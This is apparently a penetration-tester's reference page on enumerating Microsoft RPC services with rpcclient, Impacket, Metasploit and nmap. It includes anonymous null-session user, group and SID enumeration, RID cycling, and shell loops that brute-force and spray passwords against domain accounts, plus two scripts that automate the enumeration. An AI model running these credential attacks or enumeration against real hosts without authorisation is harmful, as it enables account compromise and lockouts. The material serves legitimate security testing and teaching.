akde/infosec

Information security is ultimately about managing risk


MSRPC endpoint mapper on tcp/135 and udp/135; Microsoft Remote Procedure Call over HTTP (RPC as a web service) also on tcp/593.

Enumeration

Obtain general information. Note that rpcinfo talks to the ONC/Sun RPC portmapper (tcp/111), not to the Microsoft endpoint mapper on tcp/135, so this only yields something if the host also runs portmap/rpcbind.

# rpcinfo -p $target
# rpcinfo -s $target

Connect with a null session (-N skips the password prompt). Hint: tab completion works; enum<tab> lists all enum commands.

rpcclient -U "" -N $target

Enumerate all registered endpoints (interface UUIDs and their bindings) with one of the following options.

python /usr/local/bin/rpcdump.py $target | tee rpcdump.txt
msf > use auxiliary/scanner/dcerpc/endpoint_mapper
nmap -n -sV -p 135 --script=msrpc-enum $target
getArch.py -target $target

Check whether the RPC endpoints allow anonymous access.

msf > use auxiliary/scanner/dcerpc/hidden
msf > use auxiliary/scanner/dcerpc/management
msf > use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor

See here for a list of what the UUIDs mean.

Connect directly to an endpoint (the port is the dynamic high port the endpoint mapper reports for that interface; 49672 is an example) via

rpcclient ncacn_ip_tcp:$target[49672]

But in general, you can use rpcclient (see below) to access all endpoints in a shell.
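As an added example (not the page's own script), the following shell reduces rpcdump.py output to a list of interface UUIDs and the TCP ports they are bound to, which is the information needed for the direct rpcclient connect above. The rpcdump.py layout it parses (a "UUID    :" line, a "Bindings:" line, one indented binding per line) is assumed from the tool's output; the sample block is constructed, with a made-up host 10.0.0.5 and LRPC name, while the two UUIDs are the real MS-SCMR and MS-SAMR interface IDs.

```sh
#!/bin/sh
# Added example, not the page's own script: reduce rpcdump.py output to
# "UUID version port" so a specific interface can be reached directly with
#   rpcclient ncacn_ip_tcp:$target[port]
# Assumed rpcdump.py layout (per interface): a "UUID    : <uuid> v<n>" line,
# a "Bindings:" line, then one indented binding string per line.

# Constructed sample in that layout; host 10.0.0.5 and the LRPC name are made up,
# the two UUIDs are the real MS-SCMR (svcctl) and MS-SAMR interface IDs.
SAMPLE_RPCDUMP='Protocol: [MS-SCMR]: Service Control Manager Remote Protocol
Provider: services.exe
UUID    : 367ABB81-9844-35F1-AD32-98F038001003 v2.0
Bindings:
          ncacn_ip_tcp:10.0.0.5[49672]
          ncalrpc:[LRPC-0123456789abcdef]

Protocol: [MS-SAMR]: Security Account Manager (SAM) Remote Protocol
Provider: samss.dll
UUID    : 12345778-1234-ABCD-EF00-0123456789AC v1.0
Bindings:
          ncacn_np:\\HOST[\pipe\samr]
          ncalrpc:[samss lpc]
'

# tcp_bindings: read rpcdump.py output on stdin, print "UUID vN PORT" for every
# interface that is exposed over ncacn_ip_tcp (pipe-only interfaces are skipped).
tcp_bindings() {
  awk '
    /^UUID/ { uuid = $3; ver = $4 }
    /ncacn_ip_tcp:/ {
      port = $0
      sub(/.*\[/, "", port)   # drop everything up to the opening bracket
      sub(/\].*/, "", port)   # drop the closing bracket and anything after it
      print uuid, ver, port
    }
  '
}

# ports_for_uuid UUID: TCP ports on which the given interface UUID is bound
# (case-insensitive; prints nothing if the interface is only reachable via pipes).
ports_for_uuid() {
  want=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
  tcp_bindings | awk -v want="$want" 'tolower($1) == want { print $3 }'
}

# bind_string TARGET PORT: the binding string rpcclient expects for a direct connect.
bind_string() {
  printf 'ncacn_ip_tcp:%s[%s]\n' "$1" "$2"
}

# Usage against a real host (not run here):
#   rpcdump.py "$target" | tee rpcdump.txt
#   for port in $(ports_for_uuid 367ABB81-9844-35F1-AD32-98F038001003 < rpcdump.txt); do
#     rpcclient -U "" -N "$(bind_string "$target" "$port")"
#   done
printf '%s' "$SAMPLE_RPCDUMP" | tcp_bindings
```

Interfaces that only show ncacn_np or ncalrpc bindings (SAMR in the sample) are not reachable on a TCP port at all; for those you go through the named pipe over SMB, which is what plain rpcclient $target does.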

Test credentials with rpcclient

Each user with their known password (users_and_passwords.txt, one user:password per line)

while IFS=: read -r username password; do
  echo "$username / $password"
  # -c runs one command and exits instead of dropping into the interactive shell;
  # a successful getusername confirms the credentials are valid
  rpcclient -U "svcorp\\${username}%${password}" -c 'getusername' "$target" < /dev/null
done < users_and_passwords.txt

Every password against every user. Check the domain lockout policy first (querydominfo 12 in rpcclient shows lockout duration, window and threshold); spraying a long list against every account locks users out.

while read -r user; do
  while read -r p; do
    echo "$user / $p"
    rpcclient -U "svcorp\\${user}%${p}" -c 'getusername' "$target" < /dev/null
  done < test_passwords.txt
done < users.txt

Enumeration with Impacket tools

See the Impacket post

Accessing RPC endpoints with rpcclient

  • RID Relative Identifier (the last component of a SID; 500 is the built-in Administrator)
  • SID Security Identifier

First, enter

help

to see a description of the available commands; rpcclient groups them by the RPC interface (endpoint) they talk to, e.g. LSARPC, SAMR, SRVSVC.

Endpoint SAM Remote Protocol

Try Impacket's samrdump.py.

Enumerate local users: there is no dedicated rpcclient command for this, but RID cycling with RID_ENUM works.

python3 /opt/ridenum/ridenum.py $target 500 50000 /usr/share/wordlists/seclists/Passwords/Common-Credentials/best110.txt /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt

Enu­mer­ate domain users:

enumdomusers

Enu­mer­ate domain groups:

enumdomgroups

Details about a user (the RID is the rid:[0x...] value from enumdomusers; rpcclient accepts it in hex or decimal).

queryuser <rid>

Details about a group

querygroup <rid>

Mem­bers of a group

querygroupmem <rid>

Other endpoints

Enumerate LSA privileges

enumprivs

System info

srvinfo

Domain name and domain SID (security identifier)

lsaquery
dsenumdomtrusts

Detect network shares

netshareenum
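As an added example (not the page's own code), the following shell wraps the rpcclient commands above: it runs them as null-session one-shots (-U "" -N -c), parses the enumdomusers and lsaquery output into names, decimal RIDs and full SIDs, and pulls the User Name and Description fields from queryuser for each account. The parsers are exercised on constructed sample output (the domain SID and the sample accounts, including "svc backup", are made up); the output formats are assumed from rpcclient's own display routines. Set TARGET to run it against a host.

```sh
#!/bin/sh
# Added example (not from the page): drive rpcclient over a null session and
# turn its SAMR/LSARPC output into usable data. The parsers run on the
# constructed samples below; set TARGET=<host> to run against a real host.
# Assumed rpcclient output formats:
#   enumdomusers -> user:[Administrator] rid:[0x1f4]
#   lsaquery     -> Domain Sid: S-1-5-21-...
#   queryuser    -> tab-indented "User Name   :" / "Description :" lines

# Constructed sample output, not captured from a real host.
SAMPLE_USERS='user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[svc backup] rid:[0x451]'
SAMPLE_LSAQUERY='Domain Name: SVCORP
Domain Sid: S-1-5-21-1111111111-2222222222-3333333333'

# rpc TARGET COMMAND: run one rpcclient command as a null session and exit.
rpc() {
  rpcclient -U "" -N -c "$2" "$1" < /dev/null
}

# parse_enumdomusers: "user:[NAME] rid:[0xHEX]" -> "NAME DECIMAL_RID", one per line.
# Names may contain spaces, so the line is split on the fixed delimiters, not on whitespace.
parse_enumdomusers() {
  while IFS= read -r line; do
    case "$line" in
      "user:["*"] rid:[0x"*"]") ;;
      *) continue ;;
    esac
    rest=${line#"user:["}
    name=${rest%"] rid:["*}
    hex=${rest##*"rid:[0x"}
    hex=${hex%"]"}
    printf '%s %s\n' "$name" "$((0x$hex))"
  done
}

# parse_domain_sid: extract the domain SID from lsaquery output.
parse_domain_sid() {
  sed -n 's/^Domain Sid: //p'
}

# user_sid DOMAIN_SID RID -> the object's full SID (domain SID plus RID).
user_sid() {
  printf '%s-%s\n' "$1" "$2"
}

# enum_users TARGET: print "NAME RID SID" for every domain user.
enum_users() {
  target=$1
  dom_sid=$(rpc "$target" 'lsaquery' | parse_domain_sid)
  rpc "$target" 'enumdomusers' | parse_enumdomusers |
  while IFS= read -r entry; do
    rid=${entry##* }
    name=${entry% *}
    printf '%s %s %s\n' "$name" "$rid" "$(user_sid "$dom_sid" "$rid")"
  done
}

# describe_users TARGET: queryuser for each RID. The Description field is worth
# reading; service-account descriptions sometimes carry credentials.
describe_users() {
  rpc "$1" 'enumdomusers' | parse_enumdomusers |
  while IFS= read -r entry; do
    rid=${entry##* }
    rpc "$1" "queryuser $rid" | grep -E '^[[:space:]]*(User Name|Description)'
  done
}

if [ -n "${TARGET:-}" ]; then
  enum_users "$TARGET"
  describe_users "$TARGET"
fi
```

The SIDs matter once you leave this host: the same RID cycling (lookupsids with the domain SID plus a RID range) finds accounts that enumdomusers does not return when anonymous SAMR enumeration is blocked but LSARPC lookups are still allowed.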
